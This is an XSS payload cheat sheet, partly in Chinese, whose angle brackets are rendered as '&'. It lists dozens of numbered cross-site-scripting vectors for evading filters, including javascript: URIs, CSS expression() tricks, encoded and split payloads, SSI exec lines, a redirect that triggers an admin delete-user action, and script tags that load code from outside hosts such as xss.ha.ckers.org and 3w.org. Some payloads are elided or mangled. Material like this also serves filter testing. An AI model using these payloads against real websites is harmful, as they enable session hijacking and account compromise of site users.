HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XoSS');"&&IFR & &AME src=javascript:alert('XSnS')&&/IFRA & &ME&&FRAMESET&&FRAME src=javascript:alert('XpSS')&&/FRAME&&/FRAMESET&&TABLE BACKGROUND="javascript:alert('XSqS')"&&DIV STYLE="background-image: url(javascript:alert('X1SS'))"&&DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"&&DIV STYLE="width: expression(alert('X2SS'));"&&STYLE&@im\port'\ja\vasc\ript:alert("X3SS")';&/STYLE&&IMG STYLE='xss:expre\ssion(alert("X5SS"))'&&STYLE TYPE="text/javascript"&alert('X4SS');&/STYLE&&STYLE TYPE="text/css"&.XSS{background-image:url("javascript:alert('X6SS')");}&/STYLE&&A CLASS=XSS&&/A&&STYLE type="text/css"&BODY{background:url("javascript:alert('X7SS')")}&/STYLE&&BASE href="javascript:alert('X8SS');//"&getURL("javascript:alert('X9SS')")a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);&XML src="javascript:alert('X11SS');"&"& &BODY ONLOAD="a();"&&SCRIPT&function a(){alert('X12SS');}&/SCRIPT&&"&SCRIPT src="http://xss.ha.ckers.org/xss.jpg"&&/SCRIPT&&IMG src="javascript:alert('X13SS')"&!--#exec cmd="/bin/echo '&SCRIPT SRC'"--&&!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js&&/SCRIPT&'"--&&IMG src="/somecommand.php?somevariables=maliciouscode"&&SCRIPT a="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT ="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT a="&" '' src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT "a='&'" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT&document.write("&SCRI");&/SCRIPT&PT src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&A href=http://www.go//&link&/A&&DIV STYLE="width:expression(alert('anyunix'));"&&IMG SRC='vbscript:msgbox("anyunix")'&&STYLE&width:expression(alert('anyunix'));&/STYLE&(1)普通的XSS JavaScript注入&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(2)IMG标签XSS使用JavaScript命令&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(3)IMG标签无分号无引号&IMG SRC=javascript:alert('XSS')&(4)IMG标签大小写不敏感&IMG SRC=JaVaScRiPt:alert('XSS')&(5)HTML编码(必须有分号)&IMG 
SRC=javascript:alert("XSS")&(6)修正缺陷IMG标签&IMG """&&SCRIPT&alert("XSS")&/SCRIPT&"&(7)formCharCode标签(计算器)&IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&(8)UTF-8的Unicode编码(计算器)&IMG SRC=jav..省略..S')&(9)7位的UTF-8的Unicode编码是没有分号的(计算器)&IMG SRC=jav..省略..S')&(10)十六进制编码也是没有分号(计算器)&IMG SRC=java..省略..XSS')&(11)嵌入式标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(12)嵌入式编码标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(13)嵌入式换行符&IMG SRC="jav ascript:alert('XSS');"&(14)嵌入式回车&IMG SRC="jav ascript:alert('XSS');"&(15)嵌入式多行注入JavaScript,这是XSS极端的例子&IMG SRC="javascript:alert('XSS')"&(16)解决限制字符(要求同页面)&script&z='document.'&/script&&script&z=z+'write("'&/script&&script&z=z+'&script'&/script&&script&z=z+' src=ht'&/script&&script&z=z+'tp://ww'&/script&&script&z=z+'w.shell'&/script&&script&z=z+'.net/1.'&/script&&script&z=z+'js&&/sc'&/script&&script&z=z+'ript&")'&/script&&script&eval_r(z)&/script&(17)空字符perl -e 'print "&IMG SRC=java\0script:alert(\"XSS\")&";' & out(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用perl -e 'print "&SCR\0IPT&alert(\"XSS\")&/SCR\0IPT&";' & out(19)Spaces和meta前的IMG标签&IMG SRC=" javascript:alert('XSS');"&(20)Non-alpha-non-digit XSS&SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(21)Non-alpha-non-digit XSS to 2&BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")&(22)Non-alpha-non-digit XSS to 3&SCRIPT/SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(23)双开括号&&SCRIPT&alert("XSS");//&&/SCRIPT&(24)无结束脚本标记(仅火狐等浏览器)&SCRIPT SRC=http://3w.org/XSS/xss.js?&B&(25)无结束脚本标记2&SCRIPT SRC=//3w.org/XSS/xss.js&(26)半开的HTML/JavaScript XSS&IMG SRC="javascript:alert('XSS')"(27)双开角括号&iframe src=http://3w.org/XSS.html &(28)无单引号 双引号 分号&SCRIPT&a=/XSS/alert(a.source)&/SCRIPT&(29)换码过滤的JavaScript\";alert('XSS');//(30)结束Title标签&/TITLE&&SCRIPT&alert("XSS");&/SCRIPT&(31)Input Image&INPUT SRC="javascript:alert('XSS');"&(32)BODY Image&BODY BACKGROUND="javascript:alert('XSS')"&(33)BODY标签&BODY('XSS')&(34)IMG Dynsrc&IMG DYNSRC="javascript:alert('XSS')"&(35)IMG Lowsrc&IMG 
LOWSRC="javascript:alert('XSS')"&(36)BGSOUND&BGSOUND SRC="javascript:alert('XSS');"&(37)STYLE sheet&LINK REL="stylesheet" HREF="javascript:alert('XSS');"&(38)远程样式表&LINK REL="stylesheet" HREF="http://3w.org/xss.css"&(39)List-style-image(列表式)&STYLE&li {list-style-image: url("javascript:alert('XSS')");}&/STYLE&&UL&&LI&XSS(40)IMG VBscript&IMG SRC='vbscript:msgbox("XSS")'&&/STYLE&&UL&&LI&XSS(41)META链接url&META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&(42)Iframe&IFRAME SRC="javascript:alert('XSS');"&&/IFRAME&(43)Frame&FRAMESET&&FRAME SRC="javascript:alert('XSS');"&&/FRAMESET&(44)Table&TABLE BACKGROUND="javascript:alert('XSS')"&(45)TD&TABLE&&TD BACKGROUND="javascript:alert('XSS')"&(46)DIV background-image&DIV STYLE="background-image: url(javascript:alert('XSS'))"&(47)DIV background-image后加上额外字符(1-32&34&39&160&&)&DIV STYLE="background-image: url( javascript:alert('XSS'))"&(48)DIV expression&DIV STYLE="width: expression_r(alert('XSS'));"&(49)STYLE属性分拆表达&IMG STYLE="xss:expression_r(alert('XSS'))"&(50)匿名STYLE(组成:开角号和一个字母开头)&XSS STYLE="xss:expression_r(alert('XSS'))"&(51)STYLE background-image&STYLE&.XSS{background-image:url("javascript:alert('XSS')");}&/STYLE&&A CLASS=XSS&&/A&(52)IMG STYLE方式exppression(alert("XSS"))'&(53)STYLE background&STYLE&&STYLE type="text/css"&BODY{background:url("javascript:alert('XSS')")}&/STYLE&(54)BASE&BASE HREF="javascript:alert('XSS');//"&(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS&EMBED SRC="http://3w.org/XSS/xss.swf" &&/EMBED&(56)在flash中使用ActionScrpt可以混进你XSS的代码a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上&HTML xmlns:xss&&?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"&&xss:xss&XSS&/xss:xss&&/HTML&(58)如果过滤了你的JS你可以在图片里添加JS代码来利用&SCRIPT SRC=""&&/SCRIPT&(59)IMG嵌入式命令,可执行任意命令&IMG SRC="/a.php?a=b"&(60)IMG嵌入式命令(a.jpg在同服务器)Redirect 302 /a.jpg /admin.asp&deleteuser(61)绕符号过滤&SCRIPT a="&" SRC="http://3w.org/xss.js"&&/SCRIPT&(62)&SCRIPT ="&" 
SRC="http://3w.org/xss.js"&&/SCRIPT&(63)&SCRIPT a="&" " SRC="http://3w.org/xss.js"&&/SCRIPT&(64)&SCRIPT "a='&'" SRC="http://3w.org/xss.js"&&/SCRIPT&(65)&SCRIPT a=`&` SRC="http://3w.org/xss.js"&&/SCRIPT&(66)&SCRIPT a="&'&" SRC="http://3w.org/xss.js"&&/SCRIPT&(67)&SCRIPT&document.write("&SCRI");&/SCRIPT&PT SRC="http://3w.org/xss.js"&&/SCRIPT&(68)URL绕行&A HREF="http://127.0.0.1/"&XSS&/A&(69)URL编码&A HREF="http://3w.org"&XSS&/A&(70)IP十进制&A HREF="http://″&XSS&/A&(71)IP十六进制&A HREF="http://0xc0.0xa8.0×00.0×01″&XSS&/A&(72)IP八进制&A HREF="http://00.0001″&XSS&/A&(73)混合编码&A HREF="htt p://6 6.×7.147/""&XSS&/A&(74)节省[http:]&A HREF="///"&XSS&/A&(75)节省[www]&A HREF="/"&XSS&/A&(76)绝对点绝对DNS&A HREF="./"&XSS&/A&(77)javascript链接&A HREF="javascript:document.location='/'"&XSS&/A&Code: &INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);"&Code: &BODY BACKGROUND="javascript:alert(XSS)"&Code: &BODY ONLOAD=alert(XSS)&Code: &IMG DYNSRC="javascript:alert(XSS)"&Code: &BGSOUND SRC="javascript:alert(XSS);"&Code: &BR SIZE="&{alert(XSS)}"& &(netspace)Code: &LINK REL="stylesheet" HREF="javascript:alert(XSS);"&Code: &LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"&Code: &STYLE&@importhttp://ha.ckers.org/xss.&/STYLE&Code: &META HTTP-EQUIV="Link" Content="&http://ha.ckers.org/xss.css&; REL=stylesheet"&Code: &STYLE&BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}&/STYLE&Code: &XSS STYLE="behavior: url(xss.htc);"&Code: &STYLE&li {list-style-image: url("javascript:alert(XSS)");}&/STYLE&&UL&&LI&XSSCode: &IMG SRC="mocha:[code]"& (netscape only)Code: &IMG SRC="livescript:[code]"& (netscape only)Code: &TABLE BACKGROUND="javascript:alert(XSS)"&Code: &IFRAME SRC="javascript:alert(XSS);"&&/IFRAME&Code: &TABLE&&TD BACKGROUND="javascript:alert(XSS)"&Code: &DIV STYLE="background-image: url(javascript:alert(XSS))"&Code: &BASE HREF="javascript:alert(XSS);//"&&US_ASCII编码(库尔特发现)。使用7位ascii编码代替8位,可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互。Code: ?scriptualert(EXSSE)?/scriptu&META协议Code:&META 
HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);"&Code: &META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&Code: &META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);"&&对DIV进行unicode编码Code: &DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.3 053 027 029 029"&&使用expression属性Code: &DIV STYLE="width: expression(alert(XSS));"&&STYLE标签Code:&STYLE&@importjavasc ipt:alert("XSS");&/STYLE&Code: &STYLE TYPE="text/javascript"&alert(XSS);&/STYLE&Code: &STYLE&.XSS{background-image:url("javascript:alert(XSS)");}&/STYLE&&A CLASS=XSS&&/A&Code: &STYLE type="text/css"&BODY{background:url("javascript:alert(XSS)")}&/STYLE&&OBJECT标签Code: &OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&&/OBJECT&Code: &OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-&¶m name=url value=javascript:alert(XSS)&&/OBJECT&&EMBED标签Code: &EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&&/EMBED&Code: &EMBED SRC="data:image/svg+base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&&/EMBED&在flas***件中使用如下代码:Code: a="get";b="URL("";c="javascript:";d="alert(XSS);")";eval(a+b+c+d);&XML namespace可以引入行为文件htc但是必须在同一服务器上Code: &HTML xmlns:xss&& &?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&& &xss:xss&XSS&/xss:xss&&/HTML&Xss.htc: &PUBLIC:COMPONENT TAGNAME="xss"&& &&PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/&&/PUBLIC:COMPONENT&&SCRIPT&& &function main()& &{& & &alert("XSS");& &}&/SCRIPT&&使用CDATA模糊化的XML数据岛Cdoe: &XML ID=I&&X&&C&&![CDATA[&IMG 
SRC="javas]]&&![CDATA[cript:alert(XSS);"&]]&&/C&&/X&&/xml&&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&&XML数据岛Code:&XML ID="xss"&&I&&B&&IMG SRC="javas&!-- --&cript:alert(XSS)